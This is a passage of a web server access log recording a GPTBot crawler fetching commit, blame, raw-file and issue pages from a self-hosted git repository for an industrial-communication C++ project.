"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:17:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12617] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:17:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query" +[17/Feb/2026:17:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 12317] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:17:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 158] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:17:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 10784] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:17:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 23179] [Gzip 19.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:17:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:17:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" +[17/Feb/2026:17:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 15211] [Gzip 10.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:17:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:17:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10265] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 42761] [Gzip 21.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:17:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:17:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:17:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:17:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" +[17/Feb/2026:18:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12964] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13013] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12962] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:18:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md?display=rendered" [Client 74.7.227.38] [Length 20393] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/Project%20Planning-1.md" +[17/Feb/2026:18:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12771] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12373] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12861] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp?display=source" [Client 74.7.227.38] [Length 12861] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp?display=source" [Client 74.7.227.38] [Length 12771] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:18:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11417] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 